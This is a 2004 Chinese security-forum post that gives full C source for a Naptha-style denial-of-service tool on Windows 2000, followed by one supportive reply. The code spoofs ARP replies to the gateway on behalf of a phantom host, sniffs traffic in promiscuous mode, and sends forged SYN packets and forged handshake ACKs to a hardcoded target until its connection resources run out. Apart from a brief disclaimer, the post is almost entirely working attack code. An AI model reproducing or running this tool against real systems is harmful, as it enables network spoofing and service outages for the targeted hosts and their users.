论坛: 编程破解 标题: [原创]NAPTHA攻击方式在2K下的简单实现 复制本贴地址    
作者: LionD8 [liond8]    论坛用户   登录
/*
《NAPTHA攻击方式在2K下的简单实现》

  作者:LionD8
  EMAIL:liond8@eyou.com
  QQ: 10415468
  2004.2.16 凌晨


  简单原理:
  1.欺骗网关,让网关知道幻影主机的MAC.
  2.嗅探局域网中的所有数据包,判断是不是返回给虚幻主机的
  第2次握手的数据包。如果是,就伪造第3次握手.
  3.发送伪造的SYN报文.
 
  通过消耗对方的维护连接的资源进行DOS。占用通道等。

  详细原理请见Warning3老大整理的 《新型网络DoS(拒绝服务)攻击漏洞 - "Naptha"》
  我就不废话了。
  地址: http://www.nsfocus.net/index.php?act=magazine&do=view&mid=721

*/

///////////////////////////////////////////////////
//以下代码在2K VC6.0下编译通过
//在虚拟机上测试,好像2k系统如《新型网络DoS(拒绝服务)攻击漏洞 - "Naptha"》
//所说,不受什么影响.
///////////////////////////////////////////////////


#include "stdio.h"
#include "Packet32.h"
#include "windows.h"
#include <ws2tcpip.h>
#include "winsock2.h"
#include "wchar.h"

#define EPT_IP 0x0800         
#define EPT_ARP 0x0806         
#define ARP_HARDWARE 0x0001           
#define ARP_REQUEST 0x0001         
#define ARP_REPLY 0x0002

#define NDIS_PACKET_TYPE_PROMISCUOUS 0x0020 //混杂模式

#pragma comment(lib, "packet.lib")
#pragma comment(lib, "ws2_32.lib")

#pragma pack(push, 1)

typedef struct ehhdr
{
    UCHAR    eh_dst[6];     
    UCHAR    eh_src[6];       
    USHORT  eh_type;     
}EHHEADR, *PEHHEADR;

typedef struct arphdr
{
    USHORT    arp_hrd;         
    USHORT    arp_pro;         
    UCHAR    arp_hln;         
    UCHAR    arp_pln;       
    USHORT    arp_op;         
    UCHAR    arp_sha[6];       
    ULONG    arp_spa;         
    UCHAR    arp_tha[6];     
    ULONG    arp_tpa;         
}ARPHEADR, *PARPHEADR;

typedef struct arpPacket
{
    EHHEADR    ehhdr;
    ARPHEADR  arphdr;
} ARPPACKET, *PARPPACKET;

#pragma pack(pop)

typedef struct ip_head     
{
unsigned char h_verlen;   
unsigned char tos;       
unsigned short total_len; 
unsigned short ident;     
unsigned short frag_and_flags;
unsigned char ttl;       
unsigned char proto;     
unsigned short checksum; 
unsigned int sourceIP;   
unsigned int destIP;       
}IPHEADER;


typedef struct tcp_head 
{
USHORT th_sport;
USHORT th_dport;
unsigned int th_seq;
unsigned int th_ack;
unsigned char th_lenres;  
unsigned char th_flag;  
USHORT th_win;  
USHORT th_sum;
USHORT th_urp;
}TCPHEADER;

typedef struct tsd_hdr 
{
unsigned long saddr; 
unsigned long daddr; 
char mbz;
char ptcl;  
unsigned short tcpl; 
}PSDHEADER;


DWORD  WINAPI  ThreadArpSnoop(LPVOID lp);
USHORT checksum(USHORT *buffer, int size);
DWORD  WINAPI  ThreadSynFlood(LPVOID lp);
DWORD  WINAPI SnifferSynAck(LPVOID lp);
void SendAck ( DWORD SEQ , DWORD ACK ,USHORT SPort);
void AnalyseData (LPPACKET lpPacket);


#define ATPORT 80 //攻击端口
#define ATIP "192.168.1.1" //攻击IP
#define GATE "192.168.85.1" //网关
#define SNOOPIP "192.168.85.250" //幻影主机IP
#define SLEEPTIME 1000
UCHAR DMacAddr[6]={0xFF,0xFF,0xFF,0xFF,0xFF,0xFF}; //广播
UCHAR SMacAddr[6]={0xFF,0xFF,0xFF,0xFF,0xFF,0xFE}; //幻影主机MAC

BOOL  IsGoOn = TRUE;

void main()
{

IsGoOn = FALSE;
CreateThread(NULL,NULL,ThreadArpSnoop,NULL,NULL,NULL);

while ( !IsGoOn )
Sleep(1);
IsGoOn = FALSE;
CreateThread(NULL,NULL,SnifferSynAck,NULL,NULL,NULL);
while ( !IsGoOn )
Sleep(1);
CreateThread(NULL,NULL,ThreadSynFlood,NULL,NULL,NULL);

while (1)
Sleep(1000000);


}

DWORD  WINAPI  ThreadArpSnoop(LPVOID lp)
{
    static CHAR  AdapterList[10][1024];   
    TCHAR szPacketBuf[512];
    LPADAPTER    lpAdapter;
    LPPACKET    lpPacket;
    WCHAR        AdapterName[2048];
    WCHAR        *temp,*temp1;
    ARPPACKET    ARPPacket;
    ULONG AdapterLength = 1024;
    DWORD AdapterNum = 0;
    DWORD nRetCode, i;

    if(PacketGetAdapterNames((char*)AdapterName, &AdapterLength) == FALSE)
    {
printf("Unable to retrieve the list of the adapters!\n");
        return 0;
    }
    temp = AdapterName;
    temp1=AdapterName;
    i = 0;
    while ((*temp != '\0')||(*(temp-1) != '\0'))
    {
        if (*temp == '\0')
        {
            memcpy(AdapterList[i],temp1,(temp-temp1)*sizeof(WCHAR));
            temp1=temp+1;
            i++;
        }
        temp++;
    }
    AdapterNum = i;
    for (i = 0; i < AdapterNum; i++)
    wprintf(L"\n%d- %s\n", i+1, AdapterList[i]);
printf("\nPlease select adapter number:");
scanf("%d",&i);    
if(i>AdapterNum)
{
printf("\nInput Number error!");
return 0;
}

IsGoOn = TRUE;
    lpAdapter = (LPADAPTER) PacketOpenAdapter((LPTSTR) AdapterList[i-1]);
    if (!lpAdapter || (lpAdapter->hFile == INVALID_HANDLE_VALUE))
    {
        nRetCode = GetLastError();
        printf("Unable to open the driver, Error Code : %lx\n", nRetCode);
        return 0;
    }

    lpPacket = PacketAllocatePacket();
    if(lpPacket == NULL)
    {
        printf("\nError:failed to allocate the LPPACKET structure.");
        return 0;
    }
memset(szPacketBuf, 0, sizeof(szPacketBuf));
    memcpy(ARPPacket.ehhdr.eh_dst, DMacAddr, 6);   
    memcpy(ARPPacket.ehhdr.eh_src, SMacAddr, 6);   
ARPPacket.ehhdr.eh_type  = htons(EPT_ARP);
    ARPPacket.arphdr.arp_hrd = htons(ARP_HARDWARE);
    ARPPacket.arphdr.arp_pro = htons(EPT_IP);
ARPPacket.arphdr.arp_hln = 6;
    ARPPacket.arphdr.arp_pln = 4;
    ARPPacket.arphdr.arp_op = htons(1);
memcpy(ARPPacket.arphdr.arp_sha, SMacAddr, 6); 
    ARPPacket.arphdr.arp_spa = inet_addr(SNOOPIP); 
memset(ARPPacket.arphdr.arp_tha,0,6);
ARPPacket.arphdr.arp_tpa = inet_addr(GATE);
    memcpy(szPacketBuf, (char*)&ARPPacket, sizeof(ARPPacket));   
PacketInitPacket(lpPacket, szPacketBuf, 60);

    if(PacketSetNumWrites(lpAdapter, 1)==FALSE)
    {
        printf("warning: Unable to send more than one packet in a single write!\n");
    }
while ( 1 )
{
if(PacketSendPacket(lpAdapter, lpPacket, TRUE)==FALSE)
{
printf("Error sending the packets!\n");
return 0;
}
Sleep(30000);
}
    PacketFreePacket(lpPacket);
    PacketCloseAdapter(lpAdapter);
    return 0;
}


DWORD  WINAPI  ThreadSynFlood(LPVOID lp)
{
WSADATA WSAData;
SOCKET sock;
SOCKADDR_IN addr_in;
IPHEADER ipHeader;
TCPHEADER tcpHeader;
PSDHEADER psdHeader;
int SourcePort;

char szSendBuf[60]={0};
BOOL flag;
int rect,nTimeOver;
if (WSAStartup(MAKEWORD(2,2), &WSAData)!=0)
{
printf("WSAStartup Error!\n");
return 0;
}

sock=NULL;
if ((sock=socket(AF_INET,SOCK_RAW,IPPROTO_IP))==INVALID_SOCKET)
{
printf("Socket Setup Error!\n");
return 0;
}

flag=true;
if (setsockopt(sock,IPPROTO_IP, IP_HDRINCL,(char *)&flag,sizeof(flag))==SOCKET_ERROR)
{
printf("setsockopt IP_HDRINCL error!\n");
return false;
}

nTimeOver=1000;
if (setsockopt(sock, SOL_SOCKET, SO_SNDTIMEO, (char*)&nTimeOver, sizeof(nTimeOver))==SOCKET_ERROR)                                //设置发送的时间
{
printf("setsockopt SO_SNDTIMEO error!\n");
return false;
}

addr_in.sin_family=AF_INET;
addr_in.sin_port=htons(ATPORT);
addr_in.sin_addr.S_un.S_addr=inet_addr(ATIP);
ipHeader.h_verlen=(4<<4 | sizeof(ipHeader)/sizeof(unsigned long));
ipHeader.tos=0;
ipHeader.total_len=htons(sizeof(ipHeader)+sizeof(tcpHeader));    //IP总长度
ipHeader.ident=1;
ipHeader.frag_and_flags=0;               
ipHeader.ttl=123;
ipHeader.proto=IPPROTO_TCP;
ipHeader.checksum=0;
ipHeader.destIP=inet_addr(ATIP);
tcpHeader.th_dport=htons(ATPORT);
tcpHeader.th_ack=0;
tcpHeader.th_lenres=(sizeof(tcpHeader)/4<<4|0);
tcpHeader.th_flag=2;
tcpHeader.th_win=htons(512);
tcpHeader.th_urp=0;
tcpHeader.th_seq=htonl(0x12345678);     

psdHeader.daddr=ipHeader.destIP;
psdHeader.mbz=0;
psdHeader.ptcl=IPPROTO_TCP;
psdHeader.tcpl=htons(sizeof(tcpHeader));

ipHeader.sourceIP=inet_addr(SNOOPIP);
while(TRUE)
{
SourcePort=GetTickCount()%65534;

tcpHeader.th_sport=htons(SourcePort);
tcpHeader.th_sum=0;
psdHeader.saddr=ipHeader.sourceIP;

memcpy(szSendBuf, &psdHeader, sizeof(psdHeader));
memcpy(szSendBuf+sizeof(psdHeader), &tcpHeader, sizeof(tcpHeader));
tcpHeader.th_sum=checksum((USHORT *)szSendBuf,sizeof(psdHeader)+sizeof(tcpHeader));


memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));
memcpy(szSendBuf+sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader));

rect=sendto(sock, szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader), 0, (struct sockaddr*)&addr_in, sizeof(addr_in));
if (rect==SOCKET_ERROR)
{
printf("send error!:%x\n",WSAGetLastError());
return false;
}
else printf("send ok!\n");

Sleep(SLEEPTIME);
}//endwhile    
closesocket(sock);
WSACleanup();
return 0;
}

USHORT checksum(USHORT *buffer, int size)
{
unsigned long cksum=0;
while(size >1)
{
cksum+=*buffer++;
size -=sizeof(USHORT);
}
if(size)
{
cksum += *(UCHAR*)buffer;
}
cksum = (cksum >> 16) + (cksum & 0xffff);
cksum += (cksum >>16);
return (USHORT)(~cksum);
}

DWORD WINAPI SnifferSynAck(LPVOID lp)
{
LPADAPTER lpAdapter;
static CHAR AdapterList[10][1024];
ULONG AdapterNum;
WCHAR      AdapterName[2048];
    WCHAR      *temp,*temp1;
ULONG AdapterLength=1024;
ULONG i,adapter_num=0;

if(PacketGetAdapterNames((char*)AdapterName, &AdapterLength) == FALSE)
    {
printf("Unable to retrieve the list of the adapters!\n");
        return 0;
    }
    temp = AdapterName;
    temp1=AdapterName;
    i = 0;
    while ((*temp != '\0')||(*(temp-1) != '\0'))
    {
        if (*temp == '\0')
        {
            memcpy(AdapterList[i],temp1,(temp-temp1)*sizeof(WCHAR));
            temp1=temp+1;
            i++;
        }
        temp++;
    }
    AdapterNum = i;
    for (i = 0; i < AdapterNum; i++)
    wprintf(L"\n%d- %s\n", i+1, AdapterList[i]);
printf("\nPlease select adapter number:");
scanf("%d",&i);    
if(i>AdapterNum)
{
printf("\nInput Number error!");
return 0;
}
IsGoOn = TRUE;

lpAdapter=(LPADAPTER)PacketOpenAdapter((LPTSTR)AdapterList[i-1]);
    if (!lpAdapter||(lpAdapter->hFile==INVALID_HANDLE_VALUE))
    {
        printf("Unable to open the driver, Error Code : %lx\n", GetLastError());
        return 0;
    }

    //设置网卡为混杂模式
if(PacketSetHwFilter(lpAdapter,NDIS_PACKET_TYPE_PROMISCUOUS)==FALSE)
    {
        printf("Warning: Unable to set the adapter to promiscuous mode\n");
    }

if(PacketSetBuff(lpAdapter,1024*10)==FALSE)
    {
        printf("PacketSetBuff Error: %d\n",GetLastError());
        return -1;
    }

while ( 1 )
{
TCHAR Buffer[1024*10]={0};
LPPACKET lpPacket;
lpPacket=PacketAllocatePacket();       
PacketInitPacket(lpPacket,Buffer,sizeof(Buffer)); 
PacketReceivePacket(lpAdapter,lpPacket,TRUE);
AnalyseData( lpPacket );
PacketFreePacket(lpPacket);

}
return 0;
}

void AnalyseData (LPPACKET lpPacket)
{
char *Buf;
EHHEADR *lpEthdr;
bpf_hdr *lpBpfhdr;
Buf=(char *)lpPacket->Buffer;
    lpBpfhdr=(bpf_hdr *)Buf;
lpEthdr=(EHHEADR *)(Buf+lpBpfhdr->bh_hdrlen);
if(lpEthdr->eh_type==htons(0x0800) && (!memcmp(lpEthdr->eh_dst,SMacAddr,6)) )
{
TCPHEADER *lpTcphdr;
lpTcphdr=(TCPHEADER *)(Buf+lpBpfhdr->bh_hdrlen+sizeof(EHHEADR)+sizeof(IPHEADER));

if ( lpTcphdr->th_ack == ntohl(0x12345678+1) && lpTcphdr->th_flag == 0x12)
{
SendAck(lpTcphdr->th_seq,lpTcphdr->th_ack,lpTcphdr->th_dport);
}
}

}

void SendAck ( DWORD SEQ , DWORD ACK ,USHORT SPort)
{
SOCKET sock;
SOCKADDR_IN addr_in;
IPHEADER ipHeader;
TCPHEADER tcpHeader;
PSDHEADER psdHeader;

char szSendBuf[60]={0};
BOOL flag;
int rect,nTimeOver;

sock=NULL;
if ((sock=socket(AF_INET,SOCK_RAW,IPPROTO_IP))==INVALID_SOCKET)
{
printf("Socket Setup Error!\n");
return ;
}

flag=true;
if (setsockopt(sock,IPPROTO_IP, IP_HDRINCL,(char *)&flag,sizeof(flag))==SOCKET_ERROR)
{
printf("setsockopt IP_HDRINCL error!\n");
return ;
}

nTimeOver=1000;
if (setsockopt(sock, SOL_SOCKET, SO_SNDTIMEO, (char*)&nTimeOver, sizeof(nTimeOver))==SOCKET_ERROR)                                //设置发送的时间
{
printf("setsockopt SO_SNDTIMEO error!\n");
return ;
}
addr_in.sin_family=AF_INET;
addr_in.sin_port=htons(ATPORT);
addr_in.sin_addr.S_un.S_addr=inet_addr(ATIP);
ipHeader.h_verlen=(4<<4 | sizeof(ipHeader)/sizeof(unsigned long));
ipHeader.tos=0;
ipHeader.total_len=htons(sizeof(ipHeader)+sizeof(tcpHeader));    //IP总长度
ipHeader.ident=1;
ipHeader.frag_and_flags=0;               
ipHeader.ttl=123;
ipHeader.proto=IPPROTO_TCP;
ipHeader.checksum=0;
ipHeader.destIP=inet_addr(ATIP);
tcpHeader.th_dport=htons(ATPORT);
tcpHeader.th_ack=htonl((ntohl(SEQ)+1));
tcpHeader.th_lenres=(sizeof(tcpHeader)/4<<4|0);
tcpHeader.th_flag=0x10; // ack
tcpHeader.th_win=htons(512);
tcpHeader.th_urp=0;
tcpHeader.th_seq=ACK;
psdHeader.daddr=ipHeader.destIP;
psdHeader.mbz=0;
psdHeader.ptcl=IPPROTO_TCP;
psdHeader.tcpl=htons(sizeof(tcpHeader));

ipHeader.sourceIP=inet_addr(SNOOPIP);
tcpHeader.th_sport=SPort;
tcpHeader.th_sum=0;
psdHeader.saddr=ipHeader.sourceIP;
memcpy(szSendBuf, &psdHeader, sizeof(psdHeader));
memcpy(szSendBuf+sizeof(psdHeader), &tcpHeader, sizeof(tcpHeader));
tcpHeader.th_sum=checksum((USHORT *)szSendBuf,sizeof(psdHeader)+sizeof(tcpHeader));
memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));
memcpy(szSendBuf+sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader));
rect=sendto(sock, szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader), 0, (struct sockaddr*)&addr_in, sizeof(addr_in));
if (rect==SOCKET_ERROR)
{
printf("send error!:%x\n",WSAGetLastError());
return ;
}
else printf("send ok!\n");
closesocket(sock);

}

//参考文献: 《新型网络DoS(拒绝服务)攻击漏洞 - "Naptha"》
//http://www.nsfocus.net/index.php?act=magazine&do=view&mid=721
//不要攻击国内的服务器。请用自己的机器测试。
//如果擅自攻击者过后自负。

//以上是自己的一点愚解。如果有什么误解欢迎指正.


地主 发表时间: 04-02-16 01:09

回复: newmyth21 [newmyth21]   论坛用户   登录
原创的,我顶一下吧

[此贴被 沙加II(newmyth21) 在 02月17日12时13分 编辑过]

B1层 发表时间: 04-02-17 12:12

论坛: 编程破解

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号